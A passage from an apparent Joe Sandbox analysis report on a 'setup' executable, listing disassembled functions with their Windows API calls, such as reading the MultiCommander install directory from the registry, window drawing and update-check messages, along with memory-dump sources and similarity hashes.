                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,Software\MultiCommander,00000000,00020019,?), ref: 00C198CA
                                                                                                                          • RegQueryValueExW.ADVAPI32(?,InstallDir,00000000,00000001,?,?,?,Software\MultiCommander,00000000,00020019,?), ref: 00C19909
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,Software\MultiCommander,00000000,00020019,?), ref: 00C19919
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                          • String ID: InstallDir$Software\MultiCommander
                                                                                                                          • API String ID: 3677997916-1212951130
                                                                                                                          • Opcode ID: 4baf4887b7a9789afaa137f23fcb8ce5aba9356df4873d8bed0cdd12303934cd
                                                                                                                          • Instruction ID: 9537684d16be86df807566da56e7556917796f680d8f379f2fa67287f97f63e8
                                                                                                                          • Opcode Fuzzy Hash: 4baf4887b7a9789afaa137f23fcb8ce5aba9356df4873d8bed0cdd12303934cd
                                                                                                                          • Instruction Fuzzy Hash: 52112EB0A00229AADB309F16DC4CFDFBBB8EB45754F1041EAB419E2251DB704E85DF61
                                                                                                                          Function 00C400DE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 00C400E5
                                                                                                                          • GetClassNameW.USER32(?,00000000,00000400), ref: 00C40116
                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00C4014F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ClassH_prolog3LongNameWindow
                                                                                                                          • String ID: ComboBox$ComboBoxEx32
                                                                                                                          • API String ID: 297531199-1907415764
                                                                                                                          • Opcode ID: 3890c3ca7360724fe2350e67914d94dd74cc914c1c5d9a8ba844e682edf63359
                                                                                                                          • Instruction ID: 9ea707f24c1f7711b96775804a349a84eb13bc2815af2e5cd0a081ecdfb6ef58
                                                                                                                          • Opcode Fuzzy Hash: 3890c3ca7360724fe2350e67914d94dd74cc914c1c5d9a8ba844e682edf63359
                                                                                                                          • Instruction Fuzzy Hash: 6B01D872841112ABDF14EB60DD59BEE7774BF61324F204619F520721D0DF709A09DB64
                                                                                                                          Function 00C80950 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,4641B5ED,?,?,00000000,00C928E2,000000FF,?,00C8092C,?,?,00C80900,00000000), ref: 00C80985
                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C80997
                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,00C928E2,000000FF,?,00C8092C,?,?,00C80900,00000000), ref: 00C809B9
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                          • Opcode ID: f1f2dfebe4edb0af8db0cb12215febbda1b4652c2fb175b1d194928c09c322ef
                                                                                                                          • Instruction ID: 523edb75a5e7b05d7aeee1ec718f970077eaf1e5cc193b315ba3c93a4034fb8f
                                                                                                                          • Opcode Fuzzy Hash: f1f2dfebe4edb0af8db0cb12215febbda1b4652c2fb175b1d194928c09c322ef
                                                                                                                          • Instruction Fuzzy Hash: 4F01D631910625FFDB119F40CC09BAEBBB8FB04B28F00013AF821E22E1DB749904CB94
                                                                                                                          Function 00C1F2D1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,00C1F57C,00000000,%d MBytes user address space free.), ref: 00C1F2E3
                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00C1F2EA
                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,?,?,00C1F57C,00000000,%d MBytes user address space free.), ref: 00C1F2FD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressCurrentHandleModuleProcProcess
                                                                                                                          • String ID: IsWow64Process$kernel32
                                                                                                                          • API String ID: 4190356694-3789238822
                                                                                                                          • Opcode ID: 07fed59b80d785fe9fee8c22fa44930e897f2bce2c4f0fe08ed329cbf52db010
                                                                                                                          • Instruction ID: 8c5c36d9e320e10a3dbc87ef5e559223383e15543ab641a45f661928654a211f
                                                                                                                          • Opcode Fuzzy Hash: 07fed59b80d785fe9fee8c22fa44930e897f2bce2c4f0fe08ed329cbf52db010
                                                                                                                          • Instruction Fuzzy Hash: 51E0E5B1A00305ABDF009BB0EC0EB9E7AA8BB067CAF444469E001D20A0D7B8D645EA14
                                                                                                                          Function 00C381BE Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00C381C5
                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00C382C7
                                                                                                                          • DestroyWindow.USER32(?,?,?,00000000,00C38007,00000000), ref: 00C383B0
                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00C383BD
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00C383C4
                                                                                                                            • Part of subcall function 00C414B5: GetStockObject.GDI32(00000011), ref: 00C414D7
                                                                                                                            • Part of subcall function 00C414B5: GetStockObject.GDI32(0000000D), ref: 00C414E3
                                                                                                                            • Part of subcall function 00C414B5: GetObjectW.GDI32(00000000,0000005C,?), ref: 00C414F4
                                                                                                                            • Part of subcall function 00C414B5: GetDC.USER32(00000000), ref: 00C41503
                                                                                                                            • Part of subcall function 00C414B5: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C4151A
                                                                                                                            • Part of subcall function 00C414B5: MulDiv.KERNEL32(?,00000048,00000000), ref: 00C41526
                                                                                                                            • Part of subcall function 00C414B5: ReleaseDC.USER32(00000000,00000000), ref: 00C41532
                                                                                                                            • Part of subcall function 00C4119F: GlobalFree.KERNEL32 ref: 00C411A6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$Object$FreeStock$CapsDestroyDeviceH_prolog3_catchLockReleaseUnlockWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 15253214-0
                                                                                                                          • Opcode ID: 3811b1bf458667d0daa6dfc8b0131c705e725ef6702fcbfa8a55625f3de399da
                                                                                                                          • Instruction ID: d3b8a56ee3e3857063b68119736ab8a5046c6d1bad9a8f2a792ba4123fbdfbed
                                                                                                                          • Opcode Fuzzy Hash: 3811b1bf458667d0daa6dfc8b0131c705e725ef6702fcbfa8a55625f3de399da
                                                                                                                          • Instruction Fuzzy Hash: 5D514B30E1061ADFCB05DFA4C945BAEBBB4BF08710F150069F951B72A1DB74AE09DBA1
                                                                                                                          Function 00C309B8 Relevance: 7.6, APIs: 5, Instructions: 139windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 00C309BF
                                                                                                                            • Part of subcall function 00C324FC: SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 00C32536
                                                                                                                            • Part of subcall function 00C324FC: SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 00C32560
                                                                                                                            • Part of subcall function 00C324FC: GetCapture.USER32 ref: 00C32576
                                                                                                                            • Part of subcall function 00C324FC: SendMessageW.USER32(00000000,0000001F,00000000,00000000), ref: 00C32585
                                                                                                                          • GetClientRect.USER32(?,?), ref: 00C30A91
                                                                                                                          • IsMenu.USER32(00000000), ref: 00C30ACD
                                                                                                                          • AdjustWindowRectEx.USER32(?,00000000,00000000,?), ref: 00C30AE5
                                                                                                                          • GetClientRect.USER32(?,?), ref: 00C30B2D
                                                                                                                            • Part of subcall function 00C2E48B: __EH_prolog3.LIBCMT ref: 00C2E492
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageRectSend$ClientH_prolog3$AdjustCaptureMenuWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2126229686-0
                                                                                                                          • Opcode ID: 598b457b2e33bf141b7af0148afc56f5d188d399585a81cada48ecab37a38f8a
                                                                                                                          • Instruction ID: 646965871f67e0b18a744c42044c1b3d4238f759c6b1a036c221e0265b8ea8a5
                                                                                                                          • Opcode Fuzzy Hash: 598b457b2e33bf141b7af0148afc56f5d188d399585a81cada48ecab37a38f8a
                                                                                                                          • Instruction Fuzzy Hash: 26419372A10209AFDF14EBA4CD59FBEBBB9EF54314F144159F904A7292DB309E40DB90
                                                                                                                          Function 00C2318F Relevance: 7.6, APIs: 5, Instructions: 105windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C230FA: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003), ref: 00C23153
                                                                                                                            • Part of subcall function 00C230FA: VerSetConditionMask.KERNEL32(00000000,?,00000001,00000003), ref: 00C2315B
                                                                                                                            • Part of subcall function 00C230FA: VerSetConditionMask.KERNEL32(00000000,?,00000020,00000003), ref: 00C23163
                                                                                                                            • Part of subcall function 00C230FA: VerSetConditionMask.KERNEL32(00000000,?,00000010,00000003), ref: 00C2316B
                                                                                                                            • Part of subcall function 00C230FA: VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 00C23176
                                                                                                                          • GetParent.USER32(?), ref: 00C231A6
                                                                                                                          • SendMessageW.USER32(?,00000464,00000001,?), ref: 00C231D0
                                                                                                                          • SendMessageW.USER32(?,00000466,00000001,?), ref: 00C231E1
                                                                                                                          • SendMessageW.USER32(?,00000464,?,00000000), ref: 00C23238
                                                                                                                          • SendMessageW.USER32(?,00000466,?,00000000), ref: 00C23271
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ConditionMaskMessageSend$InfoParentVerifyVersion
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3342151426-0
                                                                                                                          • Opcode ID: cf97884ae77a21f5016e044d424cffa1034875b53f97858c9b662fe136a3b39d
                                                                                                                          • Instruction ID: 5270535f8c291eaf73933ccd751e85788827301d61e45ffac1ad54941086b2be
                                                                                                                          • Opcode Fuzzy Hash: cf97884ae77a21f5016e044d424cffa1034875b53f97858c9b662fe136a3b39d
                                                                                                                          • Instruction Fuzzy Hash: 0D31B5B1900310AEDB14ABB4EC86F7E77ADAB44710F20401DF655D61C1EA74EA019A18
                                                                                                                          Function 00C254C5 Relevance: 7.6, APIs: 5, Instructions: 99windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C254CF
                                                                                                                            • Part of subcall function 00C2CFF3: __EH_prolog3.LIBCMT ref: 00C2CFFA
                                                                                                                            • Part of subcall function 00C2CFF3: BeginPaint.USER32(?,?,00000004,00C389E0,?,00000058,00C1C274), ref: 00C2D026
                                                                                                                          • GetClientRect.USER32(?,?), ref: 00C2550B
                                                                                                                          • CreateCompatibleDC.GDI32(?), ref: 00C25514
                                                                                                                          • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00C25537
                                                                                                                            • Part of subcall function 00C2D7E9: SelectObject.GDI32(?,?), ref: 00C2D7F2
                                                                                                                          • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00C255B6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CompatibleCreate$BeginBitmapClientH_prolog3H_prolog3_ObjectPaintRectSelect
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1536692648-0
                                                                                                                          • Opcode ID: 44f6fdbd8bf86419ac0a09875a395dce35a9c6c51be1b2c0eb4b2e79e20f7671
                                                                                                                          • Instruction ID: 859610175551c3885dc985ad4df2660e69ae669c8f2c18831457f9069ca72419
                                                                                                                          • Opcode Fuzzy Hash: 44f6fdbd8bf86419ac0a09875a395dce35a9c6c51be1b2c0eb4b2e79e20f7671
                                                                                                                          • Instruction Fuzzy Hash: 4441E4719001299FDF15EFA4DC89AEEBB79FF19300F108199B806A7152DB316E44DF60
                                                                                                                          Function 00C01ED5 Relevance: 7.6, APIs: 6, Instructions: 96COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SetLastError.KERNEL32(0000007E,?,?,?,?,74DEFFC0,00000000), ref: 00C01F33
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,74DEFFC0,00000000), ref: 00C01F60
                                                                                                                          • SetLastError.KERNEL32(0000007E,?,?,?,?,74DEFFC0,00000000), ref: 00C01F77
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,74DEFFC0,00000000), ref: 00C01F90
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00C01FBB
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00C01FC6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$FreeGlobal
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3862222148-0
                                                                                                                          • Opcode ID: a0d997d1c0da188b32e9931cdb54761ead487fdf6ba75a717bbb1f9513780b7c
                                                                                                                          • Instruction ID: 593eeefd61ebe5324404e794cb18488f15e3031805fb7cc4a0138d6ec5a1da23
                                                                                                                          • Opcode Fuzzy Hash: a0d997d1c0da188b32e9931cdb54761ead487fdf6ba75a717bbb1f9513780b7c
                                                                                                                          • Instruction Fuzzy Hash: 71314D74A00206EFDB14DFA5CC59FAEBBF8FF08304F148469E956A71A0D771AA44DB50
                                                                                                                          Function 00C1C7A9 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 89sleepCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C1C288: UpdateWindow.USER32(?), ref: 00C1C2FA
                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 00C1C836
                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 00C1C84E
                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 00C1C860
                                                                                                                          Strings
                                                                                                                          • No update of %s available., xrefs: 00C1C87B
                                                                                                                          • Version information received., xrefs: 00C1C7B3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Sleep$UpdateWindow
                                                                                                                          • String ID: No update of %s available.$Version information received.
                                                                                                                          • API String ID: 1371002805-3891218378
                                                                                                                          • Opcode ID: da02d6da72d321c3b33248392ec87cef7eaea5c68422ad9c3a6b5ff232611576
                                                                                                                          • Instruction ID: f4ebe4ed9e65c03e172f957714064b61a9fac88de1eeec149f4bde83ca6de9a2
                                                                                                                          • Opcode Fuzzy Hash: da02d6da72d321c3b33248392ec87cef7eaea5c68422ad9c3a6b5ff232611576
                                                                                                                          • Instruction Fuzzy Hash: 38213871B80211ABEB19A3A08CC2BFD7359AF83710F140229F425671D1DBA05D91BAD1
                                                                                                                          Function 00C268FA Relevance: 7.6, APIs: 5, Instructions: 89stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C26901
                                                                                                                          • lstrlenW.KERNEL32(?,00000024,00C186ED,?,00000000,00000000,00000000,00000000,000000AC), ref: 00C2693B
                                                                                                                          • lstrlenW.KERNEL32(?,?,?), ref: 00C2695E
                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00C2698B
                                                                                                                          • lstrlenA.KERNEL32(00000007,00000007), ref: 00C2699E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$H_prolog3_
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1065084494-0
                                                                                                                          • Opcode ID: 4edd75bb7bb3291375ef0d3b955f9b69aea978b60de79c615a4d3ce5a85527c4
                                                                                                                          • Instruction ID: 2a01c1bc10ce6531745edf569177f89f76694b421c6a25b0d4feebbb4523ddd8
                                                                                                                          • Opcode Fuzzy Hash: 4edd75bb7bb3291375ef0d3b955f9b69aea978b60de79c615a4d3ce5a85527c4
                                                                                                                          • Instruction Fuzzy Hash: 90219171A042649FDB24BFA9E85A5ADB6B8FB48314B00452AF462A7680DE309941DB71
                                                                                                                          Function 00C253C3 Relevance: 7.6, APIs: 5, Instructions: 84COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetParent.USER32(?), ref: 00C253F6
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00C2540C
                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00C2543A
                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00C25446
                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00C25470
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ClientScreenWindow$MoveParentRect
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3734752182-0
                                                                                                                          • Opcode ID: 8d674b9dabbfe40115eb9c4b6735827e1ce43972377cd747b087a90f98a086b9
                                                                                                                          • Instruction ID: 6e5264cf86bac44c1696b6f83b9266f7200e48741f7f6a6055f8b1207aa89f65
                                                                                                                          • Opcode Fuzzy Hash: 8d674b9dabbfe40115eb9c4b6735827e1ce43972377cd747b087a90f98a086b9
                                                                                                                          • Instruction Fuzzy Hash: 5F31FAB1E00219AFCB00DFA9D984AAEFBF9FF48314B118156E955E3651D734AE40CFA0
                                                                                                                          Function 00C3B164 Relevance: 7.6, APIs: 5, Instructions: 66registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
